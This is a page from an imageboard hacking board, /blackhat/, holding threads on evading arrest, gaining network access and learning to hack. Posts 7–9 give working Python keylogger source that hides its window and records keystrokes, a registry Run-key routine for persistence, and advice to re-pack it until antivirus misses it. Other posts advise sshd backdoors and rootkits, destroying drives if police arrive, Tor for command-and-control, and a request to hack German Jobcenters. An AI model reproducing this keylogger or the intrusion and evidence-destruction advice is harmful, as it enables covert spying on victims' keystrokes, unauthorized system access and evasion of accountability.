[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]

/blackhat/ - BlackHat

True Hacker Ethos

Catalog

Email
Subject *
Comment *
Verification *
File
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Embed
(replaces files and can be used instead)
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, webm, mp4, pdf
Max filesize is 8 MB.
Max image dimensions are 10000 x 10000.
You may upload 1 per post.


File: 1447459488206.jpg (30.45 KB, 350x310, 35:31, download (3).jpg)

 No.12[Reply]

My findings on how to stay safe for when hacking or other trouble making.

If you like an want to hack or learn a skill but don't want to get busted set up a pen testing environment/virtualize environment. Most vm's allow you to virtualize a network so you don't hit a real computer or fuck things up.

Have different virtualize os to crack or write malware. Have one visualized os just for keeping files you don't want retrieved.

Encrypt that vm it then encrypted your hard drive if you ever get busted and they can't get the stuff it could mean less years. (If you going to do serious shit find a way to quickly destroy that hard drive if they ever show up one day.)

If you're are confident enough and want to do some real stuff there are a some real hacker challenges out.(they do get hard)

Now that i shared simple shit with you, go find and learn shit yourself.

 No.13

I forget to mention if you're going to move the important files scripts or whatever around on your physical hard drive zip and encrypt. try not to let those files come in contact with physical hard drive there are methods to finding that they were there.


 No.22

i highly recommend getting prepaid cards and using them to pay for web services like AWS or Digital Ocean and then doing the bulk of your work there. don't do hacks from there but it's often easier to do research using cloud resources these days. of course vagrant is pretty good on a local machine and don't discount docker for throw away environments.


 No.26

File: 1455487648685.png (5.58 KB, 387x268, 387:268, overwrite.png)

>>13

>try not to let those files come in contact with physical hard drive there are methods to finding that they were there.

What do you think about tools like ccleaner that you can setup to wipe free space? I've tried retrieving files wiped and couldn't.


 No.27

>>26

i like having a separate environment where i only do research, hardware bondary then virtualization. FDE across the entire drive that way you don't need to wipe really it's already scrambled just my $0.02


 No.41

File: 1458604507908.jpeg (27.45 KB, 278x181, 278:181, hacking.jpeg)




File: 1458045238132.jpg (16.79 KB, 480x301, 480:301, 31021164.jpg)

 No.40[Reply]

Hello!

Can anyone hack the German Jobcenters?



 No.39[Reply]

Ok i managed to get into locked albums of photor…ref..lect… websites, made spaces to avoid showing up in search. What I cant figure out is how to download a full sized image?

Can anyone help with that?

Here is a random open gallery, as you can see image cannot be enlarged in anyway. Does anyone know a way to get the full-res version?

photoreflect. com /store/Orderpage.aspx?pi=0LBA004F020002&po=2&pc=64

^^^^^

(made 2 spaces, to avoid coming up in search)

Thanks for the help in advance



 No.38[Reply]

I am running low on bit coins and I can not apply for a bitcoin loan nor do I trust one. I need a secondary source of income quickly by any means. ( I have basic a knowledge of computer programming) if it helps



 No.10[Reply]

ITT: Post your hack related questions, get an answer

9 posts and 1 image reply omitted. Click reply to view.

 No.33

>>30

two things

1. before you attack a network be sure you can gain elevated privileges on that network, this means tons of research on your target, be sure before you even touch the target

2. once you have access your best friend is the rootkit, you don't necessarily need a full rootkit a good sshd backdoor will work just as well and be just as stealthy. there are many examples of how to backdoor binaries on packetstorm and even some tools for doing in memory injection

bonus points if you can backdoor a system using nothing but system configuration changes :D


 No.34

>>28

>>32

TOR for c&c is becoming popular in some circles


 No.35

>>31

i think what you might be asking is how to tunnel your traffic anonymously, i recommend learning about proxychains, tor and how to route traffic over tor by default using iptables

https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy


 No.36

>>35

>>31

if you're really paranoid run all your traffic over tor using iptables and then also use tor browser, it sounds inefficient but it will ensure there are no data leaks


 No.37

>>11

ALWAYS spoof your MAC address




 No.15[Reply]

Hey guys, im trying to learn as much as I can about linux kali and turotial

 No.24

File: 1455320667030.jpg (138.52 KB, 1920x1080, 16:9, maxresdefault.jpg)

that's great how can we help? what have you been doing in kali so far?




File: 1455316773287.jpg (15.95 KB, 296x200, 37:25, 197f0c52c899a2ba2edc005f6a….jpg)

 No.23[Reply]

Are you Animu? Moe? Got Skillz?

Bored to Tears?

join Kawaii Team today! ^_^

8ch.net/kawaiiteam



 No.20[Reply]

hi, i'm the mod, i haven't been around just been busy will try to answer unanswered questions now that i'm back so sorry.



 No.18[Reply]

Disclaimer:: I'm a noob to this.

Looking for advice on basics. What do you all recommend for new people who want to practice the basics? How can one go about "hacking themselves?

Any specific OS you use? Any programs you couldn't live without?

What kind of programming languages do you use most frequently?

 No.19

two things

1. i highly recommend you learn to use Arch Linux as it will force you to learn Linux properly

2. https://www.vulnhub.com/

vuln hub has tons of vulnerable images you can download and use as a VM for pentesting and learning it's an amazing site actually.




 No.2[Reply]

As this is a teaching forum I'm curious about what types of subjects we should cover. Does anyone have something they wish someone would explain to them that seems like a mystery they can't get information about? I'd be happy to discuss it.

3 posts omitted. Click reply to view.

 No.7

if you use winreg in python you can open the registry and edit the user's runkeys so the keylogger starts when they login. you'll need a routine that copies the keylogger someplace static to reference it in the runkeys. then you could probably do like py2exe on it and pass the result to virustotal to see if it passes an av scan, then regenerate it.


 No.8


import win32api
import win32console
import win32gui
import pythoncom,pyHook

win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()


 No.9


code to add runkey for startup

def addRunKey():
fp=os.path.dirname(os.path.realpath(__file__))
file_name=sys.argv[0].split("\\")[-1]
new_file_path=fp+"\\"+file_name
keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run'

key2change= OpenKey(HKEY_CURRENT_USER,
keyVal,0,KEY_ALL_ACCESS)

SetValueEx(key2change, " Keylogger",0,REG_SZ, new_file_path)


 No.14

>>2 virtualized hacking. I wondering what the limits are when it comes to a vm.


 No.16

I'm trying to get some tutorials and other stuff I can learn to hack into Android/ios with linux kali. Phones connected to public/my wifi.




Delete Post [ ]
[]
Previous [1] Next | Catalog
[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]